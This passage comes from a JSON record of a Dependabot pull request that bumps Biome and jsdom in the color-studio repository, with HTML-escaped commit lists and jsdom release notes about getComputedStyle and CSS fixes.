docstring (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10263\"\u003e#10263\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/0ae58406b4752f296adfccf94b1d2a042c4cddc7\"\u003e\u003ccode\u003e0ae5840\u003c/code\u003e\u003c/a\u003e feat(lint/js): add \u003ccode\u003euseThisForClassMethods\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/9807\"\u003e#9807\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/83f7385f14d68704510ea4c028cfa20317698fc0\"\u003e\u003ccode\u003e83f7385\u003c/code\u003e\u003c/a\u003e feat(lint/js): add \u003ccode\u003enoBaseToString\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/9838\"\u003e#9838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/64aee454ac2db2ade31089c1438dd761c94a8d57\"\u003e\u003ccode\u003e64aee45\u003c/code\u003e\u003c/a\u003e feat(lint/html/vue): add \u003ccode\u003enoVueVOnNumberValues\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10219\"\u003e#10219\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/46393e0240944064eb2a33c1810fc4204ced0cf7\"\u003e\u003ccode\u003e46393e0\u003c/code\u003e\u003c/a\u003e ci: release (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10100\"\u003e#10100\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/biomejs/biome/commits/@biomejs/biome@2.4.15/packages/@biomejs/biome\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsdom` from 29.0.1 to 29.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jsdom/jsdom/releases\"\u003ejsdom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev29.1.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003e'border-radius'\u003c/code\u003e computed style serialization. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed computed style computation when using \u003ccode\u003e'background-origin'\u003c/code\u003e and \u003ccode\u003e'background-clip'\u003c/code\u003e CSS properties. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSignificantly optimized initial calls to \u003ccode\u003egetComputedStyle()\u003c/code\u003e, before the cache warms up. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev29.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded basic support for the ratio CSS type. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed \u003ccode\u003egetComputedStyle()\u003c/code\u003e sometimes returning outdated results after CSS was modified. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev29.0.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSignificantly improved and sped up \u003ccode\u003egetComputedStyle()\u003c/code\u003e. Computed value rules are now applied across a broader set ...\n\n_Description has been truncated_","html_url":"https://github.com/forbiddenlink/color-studio/pull/23","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/forbiddenlink%2Fcolor-studio/issues/23","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/23/packages"}}]}